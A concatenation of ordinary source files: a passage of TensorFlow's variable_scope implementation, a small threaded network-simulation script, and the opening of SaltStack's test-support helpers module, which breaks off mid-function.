or when violating reuse during variable creation. Reuse is set inside
`variable_scope`.
"""
# pylint: disable=protected-access
scope = get_variable_scope()
if scope.custom_getter is not None:
raise ValueError(
"Private access to _get_partitioned_variable is not allowed when "
"a custom getter is set. Current custom getter: %s. "
"It is likely that you're using create_partitioned_variables. "
"If so, consider instead using get_variable with a non-empty "
"partitioner parameter instead." % scope.custom_getter)
return scope._get_partitioned_variable(
_get_default_variable_store(),
name,
shape=shape,
dtype=dtype,
initializer=initializer,
regularizer=regularizer,
trainable=trainable,
collections=collections,
caching_device=caching_device,
partitioner=partitioner,
validate_shape=validate_shape,
use_resource=use_resource,
constraint=constraint,
synchronization=synchronization,
aggregation=aggregation)
# pylint: enable=protected-access
# Named like a function for compatibility with the previous
# @tf_contextlib.contextmanager definition.
class _pure_variable_scope(object): # pylint: disable=invalid-name
"""A context for the variable_scope, see `variable_scope` for docs."""
def __init__(self,
name_or_scope,
reuse=None,
initializer=None,
regularizer=None,
caching_device=None,
partitioner=None,
custom_getter=None,
old_name_scope=None,
dtype=dtypes.float32,
use_resource=None,
constraint=None):
"""Creates a context for the variable_scope, see `variable_scope` for docs.
Note: this does not create a name scope.
Args:
name_or_scope: `string` or `VariableScope`: the scope to open.
reuse: `True` or None, or tf.compat.v1.AUTO_REUSE; if `None`, we inherit
the parent scope's reuse flag.
initializer: default initializer for variables within this scope.
regularizer: default regularizer for variables within this scope.
caching_device: default caching device for variables within this scope.
partitioner: default partitioner for variables within this scope.
custom_getter: default custom getter for variables within this scope.
old_name_scope: the original name scope when re-entering a variable scope.
dtype: type of the variables within this scope (defaults to `DT_FLOAT`).
use_resource: If False, variables in this scope will be regular Variables.
If True, experimental ResourceVariables will be creates instead, with
well-defined semantics. Defaults to False (will later change to True).
constraint: An optional projection function to be applied to the variable
after being updated by an `Optimizer` (e.g. used to implement norm
constraints or value constraints for layer weights). The function must
take as input the unprojected Tensor representing the value of the
variable and return the Tensor for the projected value (which must have
the same shape). Constraints are not safe to use when doing asynchronous
distributed training.
"""
self._name_or_scope = name_or_scope
self._reuse = reuse
self._initializer = initializer
self._regularizer = regularizer
self._caching_device = caching_device
self._partitioner = partitioner
self._custom_getter = custom_getter
self._old_name_scope = old_name_scope
self._dtype = dtype
self._use_resource = use_resource
self._constraint = constraint
self._var_store = _get_default_variable_store()
self._var_scope_store = get_variable_scope_store()
self._last_variable_scope_object = None
if isinstance(self._name_or_scope, VariableScope):
self._new_name = self._name_or_scope.name
name_scope = self._name_or_scope._name_scope # pylint: disable=protected-access
# Handler for the case when we jump to a shared scope. We create a new
# VariableScope (self._var_scope_object) that contains a copy of the
# provided shared scope, possibly with changed reuse and initializer, if
# the user requested this.
variable_scope_object = VariableScope(
self._name_or_scope.reuse if not self._reuse else self._reuse,
name=self._new_name,
initializer=self._name_or_scope.initializer,
regularizer=self._name_or_scope.regularizer,
caching_device=self._name_or_scope.caching_device,
partitioner=self._name_or_scope.partitioner,
dtype=self._name_or_scope.dtype,
custom_getter=self._name_or_scope.custom_getter,
name_scope=name_scope,
use_resource=self._name_or_scope.use_resource,
constraint=self._constraint)
if self._initializer is not None:
variable_scope_object.set_initializer(self._initializer)
if self._regularizer is not None:
variable_scope_object.set_regularizer(self._regularizer)
if self._caching_device is not None:
variable_scope_object.set_caching_device(self._caching_device)
if self._partitioner is not None:
variable_scope_object.set_partitioner(self._partitioner)
if self._custom_getter is not None:
variable_scope_object.set_custom_getter(
_maybe_wrap_custom_getter(self._custom_getter,
self._name_or_scope.custom_getter))
if self._dtype is not None:
variable_scope_object.set_dtype(self._dtype)
if self._use_resource is not None:
variable_scope_object.set_use_resource(self._use_resource)
self._cached_variable_scope_object = variable_scope_object
def __enter__(self):
"""Begins the scope block.
Returns:
A VariableScope.
Raises:
ValueError: when trying to reuse within a create scope, or create within
a reuse scope, or if reuse is not `None` or `True`.
TypeError: when the types of some arguments are not appropriate.
"""
self._old = self._var_scope_store.current_scope
if isinstance(self._name_or_scope, VariableScope):
self._var_scope_store.open_variable_scope(self._new_name)
self._old_subscopes = copy.copy(
self._var_scope_store.variable_scopes_count)
variable_scope_object = self._cached_variable_scope_object
else:
# Handler for the case when we just prolong current variable scope.
# VariableScope with name extended by the provided one, and inherited
# reuse and initializer (except if the user provided values to set).
self._new_name = (
self._old.name + "/" +
self._name_or_scope if self._old.name else self._name_or_scope)
self._reuse = (self._reuse or
self._old.reuse) # Re-using is inherited by sub-scopes.
if self._old_name_scope is None:
name_scope = self._name_or_scope
else:
name_scope = self._old_name_scope
variable_scope_object = VariableScope(
self._reuse,
name=self._new_name,
initializer=self._old.initializer,
regularizer=self._old.regularizer,
caching_device=self._old.caching_device,
partitioner=self._old.partitioner,
dtype=self._old.dtype,
use_resource=self._old.use_resource,
custom_getter=self._old.custom_getter,
name_scope=name_scope,
constraint=self._constraint)
if self._initializer is not None:
variable_scope_object.set_initializer(self._initializer)
if self._regularizer is not None:
variable_scope_object.set_regularizer(self._regularizer)
if self._caching_device is not None:
variable_scope_object.set_caching_device(self._caching_device)
if self._partitioner is not None:
variable_scope_object.set_partitioner(self._partitioner)
if self._custom_getter is not None:
variable_scope_object.set_custom_getter(
_maybe_wrap_custom_getter(self._custom_getter,
self._old.custom_getter))
if self._dtype is not None:
variable_scope_object.set_dtype(self._dtype)
if self._use_resource is not None:
variable_scope_object.set_use_resource(self._use_resource)
self._var_scope_store.open_variable_scope(self._new_name)
self._var_scope_store.current_scope = variable_scope_object
self._last_variable_scope_object = variable_scope_object
return variable_scope_object
def __exit__(self, type_arg, value_arg, traceback_arg):
if (self._var_scope_store.current_scope is
not self._last_variable_scope_object):
raise RuntimeError("Improper nesting of variable_scope.")
# If jumping out from a non-prolonged scope, restore counts.
if isinstance(self._name_or_scope, VariableScope):
self._var_scope_store.variable_scopes_count = self._old_subscopes
else:
self._var_scope_store.close_variable_subscopes(self._new_name)
self._var_scope_store.current_scope = self._old
def _maybe_wrap_custom_getter(custom_getter, old_getter):
"""Wrap a call to a custom_getter to use the old_getter internally."""
if old_getter is None:
return custom_getter
# The new custom_getter should call the old one
def wrapped_custom_getter(getter, *args, **kwargs):
# Call:
# custom_getter(
# lambda: old_getter(true_getter, ...), *args, **kwargs)
# which means custom_getter will call old_getter, which
# will call the true_getter, perform any intermediate
# processing, and return the results to the current
# getter, which will also perform additional processing.
return custom_getter(functools.partial(old_getter, getter), *args, **kwargs)
return wrapped_custom_getter
def _get_unique_variable_scope(prefix):
"""Get a name with the given prefix unique in the current variable scope."""
var_scope_store = get_variable_scope_store()
current_scope = get_variable_scope()
name = current_scope.name + "/" + prefix if current_scope.name else prefix
if var_scope_store.variable_scope_count(name) == 0:
return prefix
idx = 1
while var_scope_store.variable_scope_count(name + ("_%d" % idx)) > 0:
idx += 1
return prefix + ("_%d" % idx)
# Named like a function for backwards compatibility with the
# @tf_contextlib.contextmanager version, which was switched to a class to avoid
# some object creation overhead.
@tf_export(v1=["variable_scope"]) # pylint: disable=invalid-name
class variable_scope(object):
"""A context manager for defining ops that creates variables (layers).
This context manager validates that the (optional) `values` are from the same
graph, ensures that graph is the default graph, and pushes a name scope and a
variable scope.
If `name_or_scope` is not None, it is used as is. If `name_or_scope` is None,
then `default_name` is used. In that case, if the same name has been
previously used in the same scope, it will be made unique by appending `_N`
to it.
Variable scope allows you to create new variables and to share already created
ones while providing checks to not create or share by accident. For details,
see the [Variable Scope How To](https://tensorflow.org/guide/variables), here
we present only a few basic examples.
Simple example of how to create a new variable:
```python
with tf.compat.v1.variable_scope("foo"):
with tf.compat.v1.variable_scope("bar"):
v = tf.compat.v1.get_variable("v", [1])
assert v.name == "foo/bar/v:0"
```
Simple example of how to reenter a premade variable scope safely:
```python
with tf.compat.v1.variable_scope("foo") as vs:
pass
# Re-enter the variable scope.
with tf.compat.v1.variable_scope(vs,
auxiliary_name_scope=False) as vs1:
# Restore the original name_scope.
with tf.name_scope(vs1.original_name_scope):
v = tf.compat.v1.get_variable("v", [1])
assert v.name == "foo/v:0"
c = tf.constant([1], name="c")
assert c.name == "foo/c:0"
```
Basic example of sharing a variable AUTO_REUSE:
```python
def foo():
with tf.compat.v1.variable_scope("foo", reuse=tf.compat.v1.AUTO_REUSE):
v = tf.compat.v1.get_variable("v", [1])
return v
v1 = foo() # Creates v.
v2 = foo() # Gets the same, existing v.
assert v1 == v2
```
Basic example of sharing a variable with reuse=True:
```python
with tf.compat.v1.variable_scope("foo"):
v = tf.compat.v1.get_variable("v", [1])
with tf.compat.v1.variable_scope("foo", reuse=True):
v1 = tf.compat.v1.get_variable("v", [1])
assert v1 == v
```
Sharing a variable by capturing a scope and setting reuse:
```python
with tf.compat.v1.variable_scope("foo") as scope:
v = tf.compat.v1.get_variable("v", [1])
scope.reuse_variables()
v1 = tf.compat.v1.get_variable("v", [1])
assert v1 == v
```
To prevent accidental sharing of variables, we raise an exception when getting
an existing variable in a non-reusing scope.
```python
with tf.compat.v1.variable_scope("foo"):
v = tf.compat.v1.get_variable("v", [1])
v1 = tf.compat.v1.get_variable("v", [1])
# Raises ValueError("... v already exists ...").
```
Similarly, we raise an exception when trying to get a variable that does not
exist in reuse mode.
```python
with tf.compat.v1.variable_scope("foo", reuse=True):
v = tf.compat.v1.get_variable("v", [1])
# Raises ValueError("... v does not exists ...").
```
Note that the `reuse` flag is inherited: if we open a reusing scope, then all
its sub-scopes become reusing as well.
A note about name scoping: Setting `reuse` does not impact the naming of other
ops such as mult. See related discussion on
[github#6189](https://github.com/tensorflow/tensorflow/issues/6189)
Note that up to and including version 1.0, it was allowed (though explicitly
discouraged) to pass False to the reuse argument, yielding undocumented
behaviour slightly different from None. Starting at 1.1.0 passing None and
False as reuse has exactly the same effect.
A note about using variable scopes in multi-threaded environment: Variable
scopes are thread local, so one thread will not see another thread's current
scope. Also, when using `default_name`, unique scopes names are also generated
only on a per thread basis. If the same name was used within a different
thread, that doesn't prevent a new thread from creating the same scope.
However, the underlying variable store is shared across threads (within the
same graph). As such, if another thread tries to create a new variable with
the same name as a variable created by a previous thread, it will fail unless
reuse is True.
Further, each thread starts with an empty variable scope. So if you wish to
preserve name prefixes from a scope from the main thread, you should capture
the main thread's scope and re-enter it in each thread. For e.g.
```
main_thread_scope = variable_scope.get_variable_scope()
# Thread's target function:
def thread_target_fn(captured_scope):
with variable_scope.variable_scope(captured_scope):
# .... regular code for this thread
thread = threading.Thread(target=thread_target_fn, args=(main_thread_scope,))
```
"""
def __init__(self,
name_or_scope,
default_name=None,
values=None,
initializer=None,
regularizer=None,
caching_device=None,
partitioner=None,
custom_getter=None,
reuse=None,
dtype=None,
use_resource=None,
constraint=None,
auxiliary_name_scope=True):
"""Initialize the context manager.
Args:
name_or_scope: `string` or `VariableScope`: the scope to open.
default_name: The default name to use if the `name_or_scope` argument is
`None`, this name will be uniquified. If name_or_scope is provided it
won't be used and therefore it is not required and can be None.
values: The list of `Tensor` arguments that are passed to the op function.
initializer: default initializer for variables within this scope.
regularizer: default regularizer for variables within this scope.
caching_device: default caching device for variables within this scope.
partitioner: default partitioner for variables within this scope.
custom_getter: default custom getter for variables within this scope.
reuse: `True`, None, or tf.compat.v1.AUTO_REUSE; if `True`, we go into
reuse mode for this scope as well as all sub-scopes; if
tf.compat.v1.AUTO_REUSE, we create variables if they do not exist, and
return them otherwise; if None, we inherit the parent scope's reuse
flag. When eager execution is enabled, new variables are always created
unless an EagerVariableStore or template is currently active.
dtype: type of variables created in this scope (defaults to the type in
the passed scope, or inherited from parent scope).
use_resource: If False, all variables will be regular Variables. If True,
experimental ResourceVariables with well-defined semantics will be used
instead. Defaults to False (will later change to True). When eager
execution is enabled this argument is always forced to be True.
constraint: An optional projection function to be applied to the variable
after being updated by an `Optimizer` (e.g. used to implement norm
constraints or value constraints for layer weights). The function must
take as input the unprojected Tensor representing the value of the
variable and return the Tensor for the projected value (which must have
the same shape). Constraints are not safe to use when doing asynchronous
distributed training.
auxiliary_name_scope: If `True`, we create an auxiliary name scope with
the scope. If `False`, we don't create it. Note that the argument is not
inherited, and it only takes effect for once when creating. You should
only use it for re-entering a premade variable scope.
Returns:
A scope that can be captured and reused.
Raises:
ValueError: when trying to reuse within a create scope, or create within
a reuse scope.
TypeError: when the types of some arguments are not appropriate.
"""
self._name_or_scope = name_or_scope
self._default_name = default_name
self._values = values
self._initializer = initializer
self._regularizer = regularizer
self._caching_device = caching_device
self._partitioner = partitioner
self._custom_getter = custom_getter
self._reuse = reuse
self._dtype = dtype
self._use_resource = use_resource
self._constraint = constraint
if self._default_name is None and self._name_or_scope is None:
raise TypeError("If default_name is None then name_or_scope is required")
if self._reuse is False:
# We don't allow non-inheriting scopes, False = None here.
self._reuse = None
if not (self._reuse is True
or self._reuse is None
or self._reuse is AUTO_REUSE):
raise ValueError("The reuse parameter must be True or False or None.")
if self._values is None:
self._values = []
self._in_graph_mode = not context.executing_eagerly()
if self._in_graph_mode:
self._graph = ops._get_graph_from_inputs(self._values) # pylint: disable=protected-access
self._cached_pure_variable_scope = None
self._current_name_scope = None
if not isinstance(auxiliary_name_scope, bool):
raise TypeError("The auxiliary_name_scope must be `True` or `False`, "
"while get {}".format(auxiliary_name_scope))
self._auxiliary_name_scope = auxiliary_name_scope
def __enter__(self):
# If the default graph is building a function, then we should not replace it
# with the cached graph.
if ops.get_default_graph().building_function:
self._building_function = True
else:
self._building_function = False
if self._in_graph_mode and not self._building_function:
self._graph_context_manager = self._graph.as_default()
self._graph_context_manager.__enter__()
if self._cached_pure_variable_scope is not None:
# Fast path for re-entering variable_scopes. We've held on to the pure
# variable scope from a previous successful __enter__, so we avoid some
# overhead by re-using that object.
if self._current_name_scope is not None:
self._current_name_scope.__enter__()
return self._cached_pure_variable_scope.__enter__()
try:
return self._enter_scope_uncached()
finally:
if (self._in_graph_mode and not self._building_function and
self._graph_context_manager is not None):
self._graph_context_manager.__exit__(*sys.exc_info())
def _enter_scope_uncached(self):
"""Enters the context manager when there is no cached scope yet.
Returns:
The entered variable scope.
Raises:
TypeError: A wrong type is passed as `scope` at __init__().
ValueError: `reuse` is incorrectly set at __init__().
"""
if self._auxiliary_name_scope:
# Create a new name scope later
current_name_scope = None
else:
# Reenter the current name scope
name_scope = ops.get_name_scope()
if name_scope:
# Hack to reenter
name_scope += "/"
current_name_scope = ops.name_scope(name_scope)
else:
# Root scope
current_name_scope = ops.name_scope(name_scope)
# IMPORTANT: Only assign to self._cached_pure_variable_scope and
# self._current_name_scope after successful __enter__() calls.
if self._name_or_scope is not None:
if not isinstance(self._name_or_scope,
(VariableScope,) + six.string_types):
raise TypeError("VariableScope: name_or_scope must be a string or "
"VariableScope.")
if isinstance(self._name_or_scope, six.string_types):
name_scope = self._name_or_scope
else:
name_scope = self._name_or_scope.name.split("/")[-1]
if name_scope or current_name_scope:
current_name_scope = current_name_scope or ops.name_scope(name_scope)
try:
current_name_scope_name = current_name_scope.__enter__()
except:
current_name_scope.__exit__(*sys.exc_info())
raise
self._current_name_scope = current_name_scope
if isinstance(self._name_or_scope, six.string_types):
old_name_scope = current_name_scope_name
else:
old_name_scope = self._name_or_scope.original_name_scope
pure_variable_scope = _pure_variable_scope(
self._name_or_scope,
reuse=self._reuse,
initializer=self._initializer,
regularizer=self._regularizer,
caching_device=self._caching_device,
partitioner=self._partitioner,
custom_getter=self._custom_getter,
old_name_scope=old_name_scope,
dtype=self._dtype,
use_resource=self._use_resource,
constraint=self._constraint)
try:
entered_pure_variable_scope = pure_variable_scope.__enter__()
except:
pure_variable_scope.__exit__(*sys.exc_info())
raise
self._cached_pure_variable_scope = pure_variable_scope
return entered_pure_variable_scope
else:
self._current_name_scope = None
# This can only happen if someone is entering the root variable scope.
pure_variable_scope = _pure_variable_scope(
self._name_or_scope,
reuse=self._reuse,
initializer=self._initializer,
regularizer=self._regularizer,
caching_device=self._caching_device,
partitioner=self._partitioner,
custom_getter=self._custom_getter,
dtype=self._dtype,
use_resource=self._use_resource,
constraint=self._constraint)
try:
entered_pure_variable_scope = pure_variable_scope.__enter__()
except:
pure_variable_scope.__exit__(*sys.exc_info())
raise
self._cached_pure_variable_scope = pure_variable_scope
return entered_pure_variable_scope
else: # Here name_or_scope is None. Using default name, but made unique.
if self._reuse:
raise ValueError("reuse=True cannot be used without a name_or_scope")
current_name_scope = current_name_scope or ops.name_scope(
self._default_name)
try:
current_name_scope_name = current_name_scope.__enter__()
except:
current_name_scope.__exit__(*sys.exc_info())
raise
self._current_name_scope = current_name_scope
unique_default_name = _get_unique_variable_scope(self._default_name)
pure_variable_scope = _pure_variable_scope(
unique_default_name,
initializer=self._initializer,
regularizer=self._regularizer,
caching_device=self._caching_device,
partitioner=self._partitioner,
custom_getter=self._custom_getter,
old_name_scope=current_name_scope_name,
dtype=self._dtype,
use_resource=self._use_resource,
constraint=self._constraint)
try:
entered_pure_variable_scope = pure_variable_scope.__enter__()
except:
pure_variable_scope.__exit__(*sys.exc_info())
raise
self._cached_pure_variable_scope = pure_variable_scope
return entered_pure_variable_scope
def __exit__(self, type_arg, value_arg, traceback_arg):
self._cached_pure_variable_scope.__exit__(type_arg, value_arg,
traceback_arg)
if self._current_name_scope:
self._current_name_scope.__exit__(type_arg, value_arg, traceback_arg)
if self._in_graph_mode and not self._building_function:
self._graph_context_manager.__exit__(type_arg, value_arg, traceback_arg)
# pylint: disable=g-doc-return-or-yield
@tf_export(v1=["variable_op_scope"])
@tf_contextlib.contextmanager
def variable_op_scope(values,
name_or_scope,
default_name=None,
initializer=None,
regularizer=None,
caching_device=None,
partitioner=None,
custom_getter=None,
reuse=None,
dtype=None,
use_resource=None,
constraint=None):
"""Deprecated: context manager for defining an op that creates variables."""
logging.warn("tf.variable_op_scope(values, name, default_name) is deprecated,"
" use tf.variable_scope(name, default_name, values)")
with variable_scope(
name_or_scope,
default_name=default_name,
values=values,
initializer=initializer,
regularizer=regularizer,
caching_device=caching_device,
partitioner=partitioner,
custom_getter=custom_getter,
reuse=reuse,
dtype=dtype,
use_resource=use_resource,
constraint=constraint) as scope:
yield scope
def _call_partitioner(partitioner, shape, dtype):
"""Call partitioner validating its inputs/output.
Args:
partitioner: a function mapping `Tensor` shape and dtype to a list of
partitions.
shape: shape of the `Tensor` to partition, must have at least two
dimensions.
dtype: dtype of the elements in the `Tensor`.
Returns:
A list with elements >=1 and exactly one >1. The index of that
element corresponds to the partitioning axis.
"""
if not shape.is_fully_defined():
raise ValueError("Shape of a new partitioned variable must be "
"fully defined, but instead was %s." % (shape,))
if shape.ndims < 1:
raise ValueError("A partitioned Variable must have rank at least 1, "
"shape: %s" % shape)
slicing = partitioner(shape=shape, dtype=dtype)
if not isinstance(slicing, collections_lib.Sequence):
raise ValueError("Partitioner must return a sequence, but saw: %s" %
slicing)
if len(slicing) != shape.ndims:
raise ValueError(
"Partitioner returned a partition list that does not match the "
"Variable's rank: %s vs. %s" % (slicing, shape))
if any(p < 1 for p in slicing):
raise ValueError("Partitioner returned zero partitions for some axes: %s" %
slicing)
if sum(p > 1 for p in slicing) > 1:
raise ValueError("Can only slice a variable along one dimension: "
"shape: %s, partitioning: %s" % (shape, slicing))
return slicing
# TODO(slebedev): could be inlined, but
# `_VariableStore._get_partitioned_variable` is too complex even
# without this logic.
def _get_slice_dim_and_num_slices(slicing):
"""Get slicing dimension and number of slices from the partitioner output."""
for slice_dim, num_slices in enumerate(slicing):
if num_slices > 1:
break
else:
# Degenerate case: no partitioning applied.
slice_dim = 0
num_slices = 1
return slice_dim, num_slices
def _iter_slices(full_shape, num_slices, slice_dim):
"""Slices a given a shape along the specified dimension."""
num_slices_with_excess = full_shape[slice_dim] % num_slices
offset = [0] * len(full_shape)
min_slice_len = full_shape[slice_dim] // num_slices
for i in xrange(num_slices):
shape = full_shape[:]
shape[slice_dim] = min_slice_len + bool(i < num_slices_with_excess)
yield offset[:], shape
offset[slice_dim] += shape[slice_dim]
def default_variable_creator(next_creator=None, **kwargs):
"""Default variable creator."""
assert next_creator is None
initial_value = kwargs.get("initial_value", None)
trainable = kwargs.get("trainable", None)
collections = kwargs.get("collections", None)
validate_shape = kwargs.get("validate_shape", True)
caching_device = kwargs.get("caching_device", None)
name = kwargs.get("name", None)
variable_def = kwargs.get("variable_def", None)
dtype = kwargs.get("dtype", None)
expected_shape = kwargs.get("expected_shape", None)
import_scope = kwargs.get("import_scope", None)
constraint = kwargs.get("constraint", None)
use_resource = kwargs.get("use_resource", None)
synchronization = kwargs.get("synchronization", None)
aggregation = kwargs.get("aggregation", None)
shape = kwargs.get("shape", None)
if use_resource is None:
use_resource = get_variable_scope().use_resource
if use_resource is None:
use_resource = _DEFAULT_USE_RESOURCE
use_resource = use_resource or context.executing_eagerly()
if use_resource:
distribute_strategy = kwargs.get("distribute_strategy", None)
return resource_variable_ops.ResourceVariable(
initial_value=initial_value,
trainable=trainable,
collections=collections,
validate_shape=validate_shape,
caching_device=caching_device,
name=name,
dtype=dtype,
constraint=constraint,
variable_def=variable_def,
import_scope=import_scope,
distribute_strategy=distribute_strategy,
synchronization=synchronization,
aggregation=aggregation,
shape=shape)
else:
return variables.RefVariable(
initial_value=initial_value,
trainable=trainable,
collections=collections,
validate_shape=validate_shape,
caching_device=caching_device,
name=name,
dtype=dtype,
constraint=constraint,
variable_def=variable_def,
expected_shape=expected_shape,
import_scope=import_scope,
synchronization=synchronization,
aggregation=aggregation,
shape=shape)
def default_variable_creator_v2(next_creator=None, **kwargs):
"""Default variable creator."""
assert next_creator is None
initial_value = kwargs.get("initial_value", None)
trainable = kwargs.get("trainable", None)
validate_shape = kwargs.get("validate_shape", True)
caching_device = kwargs.get("caching_device", None)
name = kwargs.get("name", None)
variable_def = kwargs.get("variable_def", None)
dtype = kwargs.get("dtype", None)
import_scope = kwargs.get("import_scope", None)
constraint = kwargs.get("constraint", None)
distribute_strategy = kwargs.get("distribute_strategy", None)
synchronization = kwargs.get("synchronization", None)
aggregation = kwargs.get("aggregation", None)
shape = kwargs.get("shape", None)
return resource_variable_ops.ResourceVariable(
initial_value=initial_value,
trainable=trainable,
validate_shape=validate_shape,
caching_device=caching_device,
name=name,
dtype=dtype,
constraint=constraint,
variable_def=variable_def,
import_scope=import_scope,
distribute_strategy=distribute_strategy,
synchronization=synchronization,
aggregation=aggregation,
shape=shape)
variables.default_variable_creator = default_variable_creator
variables.default_variable_creator_v2 = default_variable_creator_v2
def _make_getter(captured_getter, captured_previous):
"""Gets around capturing loop variables in python being broken."""
return lambda **kwargs: captured_getter(captured_previous, **kwargs)
# TODO(apassos) remove forwarding symbol
variable = variables.VariableV1
@tf_export(v1=["variable_creator_scope"])
@tf_contextlib.contextmanager
def variable_creator_scope_v1(variable_creator):
"""Scope which defines a variable creation function to be used by variable().
variable_creator is expected to be a function with the following signature:
```
def variable_creator(next_creator, **kwargs)
```
The creator is supposed to eventually call the next_creator to create a
variable if it does want to create a variable and not call Variable or
ResourceVariable directly. This helps make creators composable. A creator may
choose to create multiple variables, return already existing variables, or
simply register that a variable was created and defer to the next creators in
line. Creators can also modify the keyword arguments seen by the next
creators.
Custom getters in the variable scope will eventually resolve down to these
custom creators when they do create variables.
The valid keyword arguments in kwds are:
initial_value: A `Tensor`, or Python object convertible to a `Tensor`,
which is the initial value for the Variable. The initial value must have
a shape specified unless `validate_shape` is set to False. Can also be a
callable with no argument that returns the initial value when called. In
that case, `dtype` must be specified. (Note that initializer functions
from init_ops.py must first be bound to a shape before being used here.)
trainable: If `True`, the default, also adds the variable to the graph
collection `GraphKeys.TRAINABLE_VARIABLES`. This collection is used as
the default list of variables to use by the `Optimizer` classes.
`trainable` defaults to `True`, unless `synchronization` is
set to `ON_READ`, in which case it defaults to `False`.
collections: List of graph collections keys. The new variable is added to
these collections. Defaults to `[GraphKeys.GLOBAL_VARIABLES]`.
validate_shape: If `False`, allows the variable to be initialized with a
value of unknown shape. If `True`, the default, the shape of
`initial_value` must be known.
caching_device: Optional device string describing where the Variable
should be cached for reading. Defaults to the Variable's device.
If not `None`, caches on another device. Typical use is to cache
on the device where the Ops using the Variable reside, to deduplicate
copying through `Switch` and other conditional statements.
name: Optional name for the variable. Defaults to `'Variable'` and gets
uniquified automatically.
dtype: If set, initial_value will be converted to the given type.
If `None`, either the datatype will be kept (if `initial_value` is
a Tensor), or `convert_to_tensor` will decide.
constraint: A constraint function to be applied to the variable after
updates by some algorithms.
use_resource: if True, a ResourceVariable is always created.
synchronization: Indicates when a distributed a variable will be
aggregated. Accepted values are constants defined in the class
`tf.VariableSynchronization`. By default the synchronization is set to
`AUTO` and the current `DistributionStrategy` chooses
when to synchronize.
aggregation: Indicates how a distributed variable will be aggregated.
Accepted values are constants defined in the class
`tf.VariableAggregation`.
This set may grow over time, so it's important the signature of creators is as
mentioned above.
Args:
variable_creator: the passed creator
Yields:
A scope in which the creator is active
"""
with ops.get_default_graph()._variable_creator_scope(variable_creator): # pylint: disable=protected-access
yield
# Note: only the docstrings differ between this and v1.
@tf_export("variable_creator_scope", v1=[])
@tf_contextlib.contextmanager
def variable_creator_scope(variable_creator):
"""Scope which defines a variable creation function to be used by variable().
variable_creator is expected to be a function with the following signature:
```
def variable_creator(next_creator, **kwargs)
```
The creator is supposed to eventually call the next_creator to create a
variable if it does want to create a variable and not call Variable or
ResourceVariable directly. This helps make creators composable. A creator may
choose to create multiple variables, return already existing variables, or
simply register that a variable was created and defer to the next creators in
line. Creators can also modify the keyword arguments seen by the next
creators.
Custom getters in the variable scope will eventually resolve down to these
custom creators when they do create variables.
The valid keyword arguments in kwds are:
initial_value: A `Tensor`, or Python object convertible to a `Tensor`,
which is the initial value for the Variable. The initial value must have
a shape specified unless `validate_shape` is set to False. Can also be a
callable with no argument that returns the initial value when called. In
that case, `dtype` must be specified. (Note that initializer functions
from init_ops.py must first be bound to a shape before being used here.)
trainable: If `True`, the default, GradientTapes automatically watch
uses of this Variable.
validate_shape: If `False`, allows the variable to be initialized with a
value of unknown shape. If `True`, the default, the shape of
`initial_value` must be known.
caching_device: Optional device string describing where the Variable
should be cached for reading. Defaults to the Variable's device.
If not `None`, caches on another device. Typical use is to cache
on the device where the Ops using the Variable reside, to deduplicate
copying through `Switch` and other conditional statements.
name: Optional name for the variable. Defaults to `'Variable'` and gets
uniquified automatically.
dtype: If set, initial_value will be converted to the given type.
If `None`, either the datatype will be kept (if `initial_value` is
a Tensor), or `convert_to_tensor` will decide.
constraint: A constraint function to be applied to the variable after
updates by some algorithms.
synchronization: Indicates when a distributed a variable will be
aggregated. Accepted values are constants defined in the class
`tf.VariableSynchronization`. By default the synchronization is set to
`AUTO` and the current `DistributionStrategy` chooses
when to synchronize.
aggregation: Indicates how a distributed variable will be aggregated.
Accepted values are constants defined in the class
`tf.VariableAggregation`.
This set may grow over time, so it's important the signature of creators is as
mentioned above.
Args:
variable_creator: the passed creator
Yields:
A scope in which the creator is active
"""
with ops.get_default_graph()._variable_creator_scope(variable_creator): # pylint: disable=protected-access
yield
|
simulation.py
|
'''
Created on Oct 12, 2016
@author: mwittie
'''
import network
import link
import threading
from time import sleep
##configuration parameters
router_queue_size = 0 #0 means unlimited
simulation_time = 1 #give the network sufficient time to transfer all packets before quitting
if __name__ == '__main__':
object_L = [] #keeps track of objects, so we can kill their threads
#create network nodes
client = network.Host(1)
object_L.append(client)
server = network.Host(2)
object_L.append(server)
router_a = network.Router(name='A', intf_count=1, max_queue_size=router_queue_size)
object_L.append(router_a)
#create a Link Layer to keep track of links between network nodes
link_layer = link.LinkLayer()
object_L.append(link_layer)
#add all the links
#link parameters: from_node, from_intf_num, to_node, to_intf_num, mtu
link_layer.add_link(link.Link(client, 0, router_a, 0, 50))
link_layer.add_link(link.Link(router_a, 0, server, 0, 50))
#start all the objects
thread_L = []
thread_L.append(threading.Thread(name=client.__str__(), target=client.run))
thread_L.append(threading.Thread(name=server.__str__(), target=server.run))
thread_L.append(threading.Thread(name=router_a.__str__(), target=router_a.run))
thread_L.append(threading.Thread(name="Network", target=link_layer.run))
for t in thread_L:
t.start()
#create some send events
for i in range(3):
client.udt_send(2, 'Sample data send mucho dataaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa %d' % i)
#give the network sufficient time to transfer all packets before quitting
sleep(simulation_time)
#join all threads
for o in object_L:
o.stop = True
for t in thread_L:
t.join()
print("All simulation threads joined")
# writes to host periodically
|
helpers.py
|
# -*- coding: utf-8 -*-
'''
:copyright: Copyright 2013-2017 by the SaltStack Team, see AUTHORS for more details.
:license: Apache 2.0, see LICENSE for more details.
tests.support.helpers
~~~~~~~~~~~~~~~~~~~~~
Test support helpers
'''
# pylint: disable=repr-flag-used-in-string,wrong-import-order
# Import Python libs
from __future__ import absolute_import
import base64
import errno
import functools
import inspect
import logging
import os
import random
import signal
import socket
import string
import sys
import threading
import time
import tornado.ioloop
import tornado.web
import types
# Import 3rd-party libs
import psutil # pylint: disable=3rd-party-module-not-gated
from salt.ext import six
from salt.ext.six.moves import range, builtins # pylint: disable=import-error,redefined-builtin
try:
from pytestsalt.utils import get_unused_localhost_port # pylint: disable=unused-import
except ImportError:
def get_unused_localhost_port():
'''
Return a random unused port on localhost
'''
usock = socket.socket(family=socket.AF_INET, type=socket.SOCK_STREAM)
usock.bind(('127.0.0.1', 0))
port = usock.getsockname()[1]
usock.close()
return port
# Import Salt Tests Support libs
from tests.support.unit import skip, _id
from tests.support.mock import patch
from tests.support.paths import FILES
log = logging.getLogger(__name__)
def destructiveTest(caller):
'''
Mark a test case as a destructive test for example adding or removing users
from your system.
.. code-block:: python
class MyTestCase(TestCase):
@destructiveTest
def test_create_user(self):
pass
'''
if inspect.isclass(caller):
# We're decorating a class
old_setup = getattr(caller, 'setUp', None)
def setUp(self, *args, **kwargs):
